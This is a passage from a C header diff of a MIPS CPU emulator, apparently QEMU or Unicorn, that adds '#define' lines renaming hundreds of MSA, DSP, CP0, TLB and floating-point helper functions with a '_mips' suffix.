helper_msa_ilvod_df_mips +#define helper_msa_vshf_df helper_msa_vshf_df_mips +#define helper_msa_sldi_df helper_msa_sldi_df_mips +#define helper_msa_splati_df helper_msa_splati_df_mips +#define helper_msa_copy_s_df helper_msa_copy_s_df_mips +#define helper_msa_copy_u_df helper_msa_copy_u_df_mips +#define helper_msa_insert_df helper_msa_insert_df_mips +#define helper_msa_insve_df helper_msa_insve_df_mips +#define helper_msa_ctcmsa helper_msa_ctcmsa_mips +#define helper_msa_cfcmsa helper_msa_cfcmsa_mips +#define helper_msa_move_v helper_msa_move_v_mips +#define helper_msa_fill_df helper_msa_fill_df_mips +#define helper_msa_nlzc_df helper_msa_nlzc_df_mips +#define helper_msa_nloc_df helper_msa_nloc_df_mips +#define helper_msa_pcnt_df helper_msa_pcnt_df_mips +#define helper_msa_fcaf_df helper_msa_fcaf_df_mips +#define helper_msa_fcun_df helper_msa_fcun_df_mips +#define helper_msa_fceq_df helper_msa_fceq_df_mips +#define helper_msa_fcueq_df helper_msa_fcueq_df_mips +#define helper_msa_fclt_df helper_msa_fclt_df_mips +#define helper_msa_fcult_df helper_msa_fcult_df_mips +#define helper_msa_fcle_df helper_msa_fcle_df_mips +#define helper_msa_fcule_df helper_msa_fcule_df_mips +#define helper_msa_fsaf_df helper_msa_fsaf_df_mips +#define helper_msa_fsun_df helper_msa_fsun_df_mips +#define helper_msa_fseq_df helper_msa_fseq_df_mips +#define helper_msa_fsueq_df helper_msa_fsueq_df_mips +#define helper_msa_fslt_df helper_msa_fslt_df_mips +#define helper_msa_fsult_df helper_msa_fsult_df_mips +#define helper_msa_fsle_df helper_msa_fsle_df_mips +#define helper_msa_fsule_df helper_msa_fsule_df_mips +#define helper_msa_fcor_df helper_msa_fcor_df_mips +#define helper_msa_fcune_df helper_msa_fcune_df_mips +#define helper_msa_fcne_df helper_msa_fcne_df_mips +#define helper_msa_fsor_df helper_msa_fsor_df_mips +#define helper_msa_fsune_df helper_msa_fsune_df_mips +#define helper_msa_fsne_df helper_msa_fsne_df_mips +#define helper_msa_fadd_df helper_msa_fadd_df_mips +#define helper_msa_fsub_df helper_msa_fsub_df_mips +#define helper_msa_fmul_df helper_msa_fmul_df_mips +#define helper_msa_fdiv_df helper_msa_fdiv_df_mips +#define helper_msa_fmadd_df helper_msa_fmadd_df_mips +#define helper_msa_fmsub_df helper_msa_fmsub_df_mips +#define helper_msa_fexp2_df helper_msa_fexp2_df_mips +#define helper_msa_fexdo_df helper_msa_fexdo_df_mips +#define helper_msa_ftq_df helper_msa_ftq_df_mips +#define helper_msa_fmin_df helper_msa_fmin_df_mips +#define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips +#define helper_msa_fmax_df helper_msa_fmax_df_mips +#define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips +#define helper_msa_fclass_df helper_msa_fclass_df_mips +#define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips +#define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips +#define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips +#define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips +#define helper_msa_frcp_df helper_msa_frcp_df_mips +#define helper_msa_frint_df helper_msa_frint_df_mips +#define helper_msa_flog2_df helper_msa_flog2_df_mips +#define helper_msa_fexupl_df helper_msa_fexupl_df_mips +#define helper_msa_fexupr_df helper_msa_fexupr_df_mips +#define helper_msa_ffql_df helper_msa_ffql_df_mips +#define helper_msa_ffqr_df helper_msa_ffqr_df_mips +#define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips +#define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips +#define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips +#define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips +#define helper_paddsb helper_paddsb_mips +#define helper_paddusb helper_paddusb_mips +#define helper_paddsh helper_paddsh_mips +#define helper_paddush helper_paddush_mips +#define helper_paddb helper_paddb_mips +#define helper_paddh helper_paddh_mips +#define helper_paddw helper_paddw_mips +#define helper_psubsb helper_psubsb_mips +#define helper_psubusb helper_psubusb_mips +#define helper_psubsh helper_psubsh_mips +#define helper_psubush helper_psubush_mips +#define helper_psubb helper_psubb_mips +#define helper_psubh helper_psubh_mips +#define helper_psubw helper_psubw_mips +#define helper_pshufh helper_pshufh_mips +#define helper_packsswh helper_packsswh_mips +#define helper_packsshb helper_packsshb_mips +#define helper_packushb helper_packushb_mips +#define helper_punpcklwd helper_punpcklwd_mips +#define helper_punpckhwd helper_punpckhwd_mips +#define helper_punpcklhw helper_punpcklhw_mips +#define helper_punpckhhw helper_punpckhhw_mips +#define helper_punpcklbh helper_punpcklbh_mips +#define helper_punpckhbh helper_punpckhbh_mips +#define helper_pavgh helper_pavgh_mips +#define helper_pavgb helper_pavgb_mips +#define helper_pmaxsh helper_pmaxsh_mips +#define helper_pminsh helper_pminsh_mips +#define helper_pmaxub helper_pmaxub_mips +#define helper_pminub helper_pminub_mips +#define helper_pcmpeqw helper_pcmpeqw_mips +#define helper_pcmpgtw helper_pcmpgtw_mips +#define helper_pcmpeqh helper_pcmpeqh_mips +#define helper_pcmpgth helper_pcmpgth_mips +#define helper_pcmpeqb helper_pcmpeqb_mips +#define helper_pcmpgtb helper_pcmpgtb_mips +#define helper_psllw helper_psllw_mips +#define helper_psrlw helper_psrlw_mips +#define helper_psraw helper_psraw_mips +#define helper_psllh helper_psllh_mips +#define helper_psrlh helper_psrlh_mips +#define helper_psrah helper_psrah_mips +#define helper_pmullh helper_pmullh_mips +#define helper_pmulhh helper_pmulhh_mips +#define helper_pmulhuh helper_pmulhuh_mips +#define helper_pmaddhw helper_pmaddhw_mips +#define helper_pasubub helper_pasubub_mips +#define helper_biadd helper_biadd_mips +#define helper_pmovmskb helper_pmovmskb_mips +#define helper_absq_s_ph helper_absq_s_ph_mips +#define helper_absq_s_qb helper_absq_s_qb_mips +#define helper_absq_s_w helper_absq_s_w_mips +#define helper_addqh_ph helper_addqh_ph_mips +#define helper_addqh_r_ph helper_addqh_r_ph_mips +#define helper_addqh_r_w helper_addqh_r_w_mips +#define helper_addqh_w helper_addqh_w_mips +#define helper_adduh_qb helper_adduh_qb_mips +#define helper_adduh_r_qb helper_adduh_r_qb_mips +#define helper_subqh_ph helper_subqh_ph_mips +#define helper_subqh_r_ph helper_subqh_r_ph_mips +#define helper_subqh_r_w helper_subqh_r_w_mips +#define helper_subqh_w helper_subqh_w_mips +#define helper_addq_ph helper_addq_ph_mips +#define helper_addq_s_ph helper_addq_s_ph_mips +#define helper_addq_s_w helper_addq_s_w_mips +#define helper_addu_ph helper_addu_ph_mips +#define helper_addu_qb helper_addu_qb_mips +#define helper_addu_s_ph helper_addu_s_ph_mips +#define helper_addu_s_qb helper_addu_s_qb_mips +#define helper_subq_ph helper_subq_ph_mips +#define helper_subq_s_ph helper_subq_s_ph_mips +#define helper_subq_s_w helper_subq_s_w_mips +#define helper_subu_ph helper_subu_ph_mips +#define helper_subu_qb helper_subu_qb_mips +#define helper_subu_s_ph helper_subu_s_ph_mips +#define helper_subu_s_qb helper_subu_s_qb_mips +#define helper_subuh_qb helper_subuh_qb_mips +#define helper_subuh_r_qb helper_subuh_r_qb_mips +#define helper_addsc helper_addsc_mips +#define helper_addwc helper_addwc_mips +#define helper_modsub helper_modsub_mips +#define helper_raddu_w_qb helper_raddu_w_qb_mips +#define helper_precr_qb_ph helper_precr_qb_ph_mips +#define helper_precrq_qb_ph helper_precrq_qb_ph_mips +#define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips +#define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips +#define helper_precrq_ph_w helper_precrq_ph_w_mips +#define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips +#define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips +#define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips +#define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips +#define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips +#define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips +#define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips +#define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips +#define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips +#define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips +#define helper_shll_qb helper_shll_qb_mips +#define helper_shrl_qb helper_shrl_qb_mips +#define helper_shra_qb helper_shra_qb_mips +#define helper_shra_r_qb helper_shra_r_qb_mips +#define helper_shll_ph helper_shll_ph_mips +#define helper_shll_s_ph helper_shll_s_ph_mips +#define helper_shll_s_w helper_shll_s_w_mips +#define helper_shra_r_w helper_shra_r_w_mips +#define helper_shrl_ph helper_shrl_ph_mips +#define helper_shra_ph helper_shra_ph_mips +#define helper_shra_r_ph helper_shra_r_ph_mips +#define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips +#define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips +#define helper_mulq_rs_ph helper_mulq_rs_ph_mips +#define helper_mul_ph helper_mul_ph_mips +#define helper_mul_s_ph helper_mul_s_ph_mips +#define helper_mulq_s_ph helper_mulq_s_ph_mips +#define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips +#define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips +#define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips +#define helper_mulsa_w_ph helper_mulsa_w_ph_mips +#define helper_dpau_h_qbl helper_dpau_h_qbl_mips +#define helper_dpau_h_qbr helper_dpau_h_qbr_mips +#define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips +#define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips +#define helper_dpa_w_ph helper_dpa_w_ph_mips +#define helper_dpax_w_ph helper_dpax_w_ph_mips +#define helper_dps_w_ph helper_dps_w_ph_mips +#define helper_dpsx_w_ph helper_dpsx_w_ph_mips +#define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips +#define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips +#define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips +#define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips +#define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips +#define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips +#define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips +#define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips +#define helper_maq_s_w_phl helper_maq_s_w_phl_mips +#define helper_maq_s_w_phr helper_maq_s_w_phr_mips +#define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips +#define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips +#define helper_mulq_s_w helper_mulq_s_w_mips +#define helper_mulq_rs_w helper_mulq_rs_w_mips +#define helper_bitrev helper_bitrev_mips +#define helper_insv helper_insv_mips +#define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips +#define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips +#define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips +#define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips +#define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips +#define helper_cmpu_le_qb helper_cmpu_le_qb_mips +#define helper_cmp_eq_ph helper_cmp_eq_ph_mips +#define helper_cmp_lt_ph helper_cmp_lt_ph_mips +#define helper_cmp_le_ph helper_cmp_le_ph_mips +#define helper_pick_qb helper_pick_qb_mips +#define helper_pick_ph helper_pick_ph_mips +#define helper_packrl_ph helper_packrl_ph_mips +#define helper_extr_w helper_extr_w_mips +#define helper_extr_r_w helper_extr_r_w_mips +#define helper_extr_rs_w helper_extr_rs_w_mips +#define helper_extr_s_h helper_extr_s_h_mips +#define helper_extp helper_extp_mips +#define helper_extpdp helper_extpdp_mips +#define helper_shilo helper_shilo_mips +#define helper_mthlip helper_mthlip_mips +#define cpu_wrdsp cpu_wrdsp_mips +#define helper_wrdsp helper_wrdsp_mips +#define cpu_rddsp cpu_rddsp_mips +#define helper_rddsp helper_rddsp_mips +#define helper_raise_exception_err helper_raise_exception_err_mips +#define helper_clo helper_clo_mips +#define helper_clz helper_clz_mips +#define helper_muls helper_muls_mips +#define helper_mulsu helper_mulsu_mips +#define helper_macc helper_macc_mips +#define helper_macchi helper_macchi_mips +#define helper_maccu helper_maccu_mips +#define helper_macchiu helper_macchiu_mips +#define helper_msac helper_msac_mips +#define helper_msachi helper_msachi_mips +#define helper_msacu helper_msacu_mips +#define helper_msachiu helper_msachiu_mips +#define helper_mulhi helper_mulhi_mips +#define helper_mulhiu helper_mulhiu_mips +#define helper_mulshi helper_mulshi_mips +#define helper_mulshiu helper_mulshiu_mips +#define helper_bitswap helper_bitswap_mips +#define helper_ll helper_ll_mips +#define helper_sc helper_sc_mips +#define helper_swl helper_swl_mips +#define helper_swr helper_swr_mips +#define helper_lwm helper_lwm_mips +#define helper_swm helper_swm_mips +#define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips +#define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips +#define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips +#define helper_mfc0_random helper_mfc0_random_mips +#define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips +#define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips +#define helper_mfc0_tcbind helper_mfc0_tcbind_mips +#define helper_mftc0_tcbind helper_mftc0_tcbind_mips +#define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips +#define helper_mftc0_tcrestart helper_mftc0_tcrestart_mips +#define helper_mfc0_tchalt helper_mfc0_tchalt_mips +#define helper_mftc0_tchalt helper_mftc0_tchalt_mips +#define helper_mfc0_tccontext helper_mfc0_tccontext_mips +#define helper_mftc0_tccontext helper_mftc0_tccontext_mips +#define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips +#define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips +#define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips +#define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips +#define helper_mfc0_count helper_mfc0_count_mips +#define helper_mftc0_entryhi helper_mftc0_entryhi_mips +#define helper_mftc0_cause helper_mftc0_cause_mips +#define helper_mftc0_status helper_mftc0_status_mips +#define helper_mfc0_lladdr helper_mfc0_lladdr_mips +#define helper_mfc0_watchlo helper_mfc0_watchlo_mips +#define helper_mfc0_watchhi helper_mfc0_watchhi_mips +#define helper_mfc0_debug helper_mfc0_debug_mips +#define helper_mftc0_debug helper_mftc0_debug_mips +#define helper_mtc0_index helper_mtc0_index_mips +#define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips +#define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips +#define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips +#define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips +#define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips +#define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips +#define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips +#define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips +#define helper_mtc0_yqmask helper_mtc0_yqmask_mips +#define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips +#define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips +#define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips +#define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips +#define helper_mtc0_tcbind helper_mtc0_tcbind_mips +#define helper_mttc0_tcbind helper_mttc0_tcbind_mips +#define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips +#define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips +#define helper_mtc0_tchalt helper_mtc0_tchalt_mips +#define helper_mttc0_tchalt helper_mttc0_tchalt_mips +#define helper_mtc0_tccontext helper_mtc0_tccontext_mips +#define helper_mttc0_tccontext helper_mttc0_tccontext_mips +#define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips +#define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips +#define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips +#define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips +#define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips +#define helper_mtc0_context helper_mtc0_context_mips +#define helper_mtc0_pagemask helper_mtc0_pagemask_mips +#define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips +#define helper_mtc0_wired helper_mtc0_wired_mips +#define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips +#define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips +#define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips +#define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips +#define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips +#define helper_mtc0_hwrena helper_mtc0_hwrena_mips +#define helper_mtc0_count helper_mtc0_count_mips +#define helper_mtc0_entryhi helper_mtc0_entryhi_mips +#define helper_mttc0_entryhi helper_mttc0_entryhi_mips +#define helper_mtc0_compare helper_mtc0_compare_mips +#define helper_mtc0_status helper_mtc0_status_mips +#define helper_mttc0_status helper_mttc0_status_mips +#define helper_mtc0_intctl helper_mtc0_intctl_mips +#define helper_mtc0_srsctl helper_mtc0_srsctl_mips +#define helper_mtc0_cause helper_mtc0_cause_mips +#define helper_mttc0_cause helper_mttc0_cause_mips +#define helper_mftc0_epc helper_mftc0_epc_mips +#define helper_mftc0_ebase helper_mftc0_ebase_mips +#define helper_mtc0_ebase helper_mtc0_ebase_mips +#define helper_mttc0_ebase helper_mttc0_ebase_mips +#define helper_mftc0_configx helper_mftc0_configx_mips +#define helper_mtc0_config0 helper_mtc0_config0_mips +#define helper_mtc0_config2 helper_mtc0_config2_mips +#define helper_mtc0_config4 helper_mtc0_config4_mips +#define helper_mtc0_config5 helper_mtc0_config5_mips +#define helper_mtc0_lladdr helper_mtc0_lladdr_mips +#define helper_mtc0_watchlo helper_mtc0_watchlo_mips +#define helper_mtc0_watchhi helper_mtc0_watchhi_mips +#define helper_mtc0_xcontext helper_mtc0_xcontext_mips +#define helper_mtc0_framemask helper_mtc0_framemask_mips +#define helper_mtc0_debug helper_mtc0_debug_mips +#define helper_mttc0_debug helper_mttc0_debug_mips +#define helper_mtc0_performance0 helper_mtc0_performance0_mips +#define helper_mtc0_taglo helper_mtc0_taglo_mips +#define helper_mtc0_datalo helper_mtc0_datalo_mips +#define helper_mtc0_taghi helper_mtc0_taghi_mips +#define helper_mtc0_datahi helper_mtc0_datahi_mips +#define helper_mftgpr helper_mftgpr_mips +#define helper_mftlo helper_mftlo_mips +#define helper_mfthi helper_mfthi_mips +#define helper_mftacx helper_mftacx_mips +#define helper_mftdsp helper_mftdsp_mips +#define helper_mttgpr helper_mttgpr_mips +#define helper_mttlo helper_mttlo_mips +#define helper_mtthi helper_mtthi_mips +#define helper_mttacx helper_mttacx_mips +#define helper_mttdsp helper_mttdsp_mips +#define helper_dmt helper_dmt_mips +#define helper_emt helper_emt_mips +#define helper_dvpe helper_dvpe_mips +#define helper_evpe helper_evpe_mips +#define helper_fork helper_fork_mips +#define helper_yield helper_yield_mips +#define r4k_helper_tlbinv r4k_helper_tlbinv_mips +#define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips +#define r4k_helper_tlbwi r4k_helper_tlbwi_mips +#define r4k_helper_tlbwr r4k_helper_tlbwr_mips +#define r4k_helper_tlbp r4k_helper_tlbp_mips +#define r4k_helper_tlbr r4k_helper_tlbr_mips +#define helper_tlbwi helper_tlbwi_mips +#define helper_tlbwr helper_tlbwr_mips +#define helper_tlbp helper_tlbp_mips +#define helper_tlbr helper_tlbr_mips +#define helper_tlbinv helper_tlbinv_mips +#define helper_tlbinvf helper_tlbinvf_mips +#define helper_di helper_di_mips +#define helper_ei helper_ei_mips +#define helper_eret helper_eret_mips +#define helper_deret helper_deret_mips +#define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips +#define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips +#define helper_rdhwr_cc helper_rdhwr_cc_mips +#define helper_rdhwr_ccres helper_rdhwr_ccres_mips +#define helper_pmon helper_pmon_mips +#define helper_wait helper_wait_mips +#define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips +#define mips_cpu_unassigned_access mips_cpu_unassigned_access_mips +#define ieee_rm ieee_rm_mips +#define helper_cfc1 helper_cfc1_mips +#define helper_ctc1 helper_ctc1_mips +#define ieee_ex_to_mips ieee_ex_to_mips_mips +#define helper_float_sqrt_d helper_float_sqrt_d_mips +#define helper_float_sqrt_s helper_float_sqrt_s_mips +#define helper_float_cvtd_s helper_float_cvtd_s_mips +#define helper_float_cvtd_w helper_float_cvtd_w_mips +#define helper_float_cvtd_l helper_float_cvtd_l_mips +#define helper_float_cvtl_d helper_float_cvtl_d_mips +#define helper_float_cvtl_s helper_float_cvtl_s_mips +#define helper_float_cvtps_pw helper_float_cvtps_pw_mips +#define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips +#define helper_float_cvts_d helper_float_cvts_d_mips +#define helper_float_cvts_w helper_float_cvts_w_mips +#define helper_float_cvts_l helper_float_cvts_l_mips +#define helper_float_cvts_pl helper_float_cvts_pl_mips +#define helper_float_cvts_pu helper_float_cvts_pu_mips +#define helper_float_cvtw_s helper_float_cvtw_s_mips +#define helper_float_cvtw_d helper_float_cvtw_d_mips +#define helper_float_roundl_d helper_float_roundl_d_mips +#define helper_float_roundl_s helper_float_roundl_s_mips +#define helper_float_roundw_d helper_float_roundw_d_mips +#define helper_float_roundw_s helper_float_roundw_s_mips +#define helper_float_truncl_d helper_float_truncl_d_mips +#define helper_float_truncl_s helper_float_truncl_s_mips +#define helper_float_truncw_d helper_float_truncw_d_mips +#define helper_float_truncw_s helper_float_truncw_s_mips +#define helper_float_ceill_d helper_float_ceill_d_mips +#define helper_float_ceill_s helper_float_ceill_s_mips +#define helper_float_ceilw_d helper_float_ceilw_d_mips +#define helper_float_ceilw_s helper_float_ceilw_s_mips +#define helper_float_floorl_d helper_float_floorl_d_mips +#define helper_float_floorl_s helper_float_floorl_s_mips +#define helper_float_floorw_d helper_float_floorw_d_mips +#define helper_float_floorw_s helper_float_floorw_s_mips +#define helper_float_abs_d helper_float_abs_d_mips +#define helper_float_abs_s helper_float_abs_s_mips +#define helper_float_abs_ps helper_float_abs_ps_mips +#define helper_float_chs_d helper_float_chs_d_mips +#define helper_float_chs_s helper_float_chs_s_mips +#define helper_float_chs_ps helper_float_chs_ps_mips +#define helper_float_maddf_s helper_float_maddf_s_mips +#define helper_float_maddf_d helper_float_maddf_d_mips +#define helper_float_msubf_s helper_float_msubf_s_mips +#define helper_float_msubf_d helper_float_msubf_d_mips +#define helper_float_max_s helper_float_max_s_mips +#define helper_float_max_d helper_float_max_d_mips +#define helper_float_maxa_s helper_float_maxa_s_mips +#define helper_float_maxa_d helper_float_maxa_d_mips +#define helper_float_min_s helper_float_min_s_mips +#define helper_float_min_d helper_float_min_d_mips +#define helper_float_mina_s helper_float_mina_s_mips +#define helper_float_mina_d helper_float_mina_d_mips +#define helper_float_rint_s helper_float_rint_s_mips +#define helper_float_rint_d helper_float_rint_d_mips +#define helper_float_class_s helper_float_class_s_mips +#define helper_float_class_d helper_float_class_d_mips +#define helper_float_recip_d helper_float_recip_d_mips +#define helper_float_recip_s helper_float_recip_s_mips +#define helper_float_rsqrt_d helper_float_rsqrt_d_mips +#define helper_float_rsqrt_s helper_float_rsqrt_s_mips +#define helper_float_recip1_d helper_float_recip1_d_mips +#define helper_float_recip1_s helper_float_recip1_s_mips +#define helper_float_recip1_ps helper_float_recip1_ps_mips +#define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips +#define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips +#define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips +#define helper_float_add_d helper_float_add_d_mips +#define helper_float_add_s helper_float_add_s_mips +#define helper_float_add_ps helper_float_add_ps_mips +#define helper_float_sub_d helper_float_sub_d_mips +#define helper_float_sub_s helper_float_sub_s_mips +#define helper_float_sub_ps helper_float_sub_ps_mips +#define helper_float_mul_d helper_float_mul_d_mips +#define helper_float_mul_s helper_float_mul_s_mips +#define helper_float_mul_ps helper_float_mul_ps_mips +#define helper_float_div_d helper_float_div_d_mips +#define helper_float_div_s helper_float_div_s_mips +#define helper_float_div_ps helper_float_div_ps_mips +#define helper_float_madd_d helper_float_madd_d_mips +#define helper_float_madd_s helper_float_madd_s_mips +#define helper_float_madd_ps helper_float_madd_ps_mips +#define helper_float_msub_d helper_float_msub_d_mips +#define helper_float_msub_s helper_float_msub_s_mips +#define helper_float_msub_ps helper_float_msub_ps_mips +#define helper_float_nmadd_d helper_float_nmadd_d_mips +#define helper_float_nmadd_s helper_float_nmadd_s_mips +#define helper_float_nmadd_ps helper_float_nmadd_ps_mips +#define helper_float_nmsub_d helper_float_nmsub_d_mips +#define helper_float_nmsub_s helper_float_nmsub_s_mips +#define helper_float_nmsub_ps helper_float_nmsub_ps_mips +#define helper_float_recip2_d helper_float_recip2_d_mips +#define helper_float_recip2_s helper_float_recip2_s_mips +#define helper_float_recip2_ps helper_float_recip2_ps_mips +#define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips +#define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips +#define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips +#define helper_float_addr_ps helper_float_addr_ps_mips +#define helper_float_mulr_ps helper_float_mulr_ps_mips +#define helper_cmp_d_f helper_cmp_d_f_mips +#define helper_cmpabs_d_f helper_cmpabs_d_f_mips +#define helper_cmp_d_un helper_cmp_d_un_mips +#define helper_cmpabs_d_un helper_cmpabs_d_un_mips +#define helper_cmp_d_eq helper_cmp_d_eq_mips +#define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips +#define helper_cmp_d_ueq helper_cmp_d_ueq_mips +#define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips +#define helper_cmp_d_olt helper_cmp_d_olt_mips +#define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips +#define helper_cmp_d_ult helper_cmp_d_ult_mips +#define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips +#define helper_cmp_d_ole helper_cmp_d_ole_mips +#define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips +#define helper_cmp_d_ule helper_cmp_d_ule_mips +#define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips +#define helper_cmp_d_sf helper_cmp_d_sf_mips +#define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips +#define helper_cmp_d_ngle helper_cmp_d_ngle_mips +#define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips +#define helper_cmp_d_seq helper_cmp_d_seq_mips +#define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips +#define helper_cmp_d_ngl helper_cmp_d_ngl_mips +#define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips +#define helper_cmp_d_lt helper_cmp_d_lt_mips +#define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips +#define helper_cmp_d_nge helper_cmp_d_nge_mips +#define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips +#define helper_cmp_d_le helper_cmp_d_le_mips +#define helper_cmpabs_d_le helper_cmpabs_d_le_mips +#define helper_cmp_d_ngt helper_cmp_d_ngt_mips +#define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips +#define helper_cmp_s_f helper_cmp_s_f_mips +#define helper_cmpabs_s_f helper_cmpabs_s_f_mips +#define helper_cmp_s_un helper_cmp_s_un_mips +#define helper_cmpabs_s_un helper_cmpabs_s_un_mips +#define helper_cmp_s_eq helper_cmp_s_eq_mips +#define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips +#define helper_cmp_s_ueq helper_cmp_s_ueq_mips +#define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips +#define helper_cmp_s_olt helper_cmp_s_olt_mips +#define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips +#define helper_cmp_s_ult helper_cmp_s_ult_mips +#define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips +#define helper_cmp_s_ole helper_cmp_s_ole_mips +#define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips +#define helper_cmp_s_ule helper_cmp_s_ule_mips +#define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips +#define helper_cmp_s_sf helper_cmp_s_sf_mips +#define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips +#define helper_cmp_s_ngle helper_cmp_s_ngle_mips +#define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips +#define helper_cmp_s_seq helper_cmp_s_seq_mips +#define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips +#define helper_cmp_s_ngl helper_cmp_s_ngl_mips +#define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips +#define helper_cmp_s_lt helper_cmp_s_lt_mips +#define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips +#define helper_cmp_s_nge helper_cmp_s_nge_mips +#define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips +#define helper_cmp_s_le helper_cmp_s_le_mips +#define helper_cmpabs_s_le helper_cmpabs_s_le_mips +#define helper_cmp_s_ngt helper_cmp_s_ngt_mips +#define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips +#define helper_cmp_ps_f helper_cmp_ps_f_mips +#define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips +#define helper_cmp_ps_un helper_cmp_ps_un_mips +#define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips +#define helper_cmp_ps_eq helper_cmp_ps_eq_mips +#define 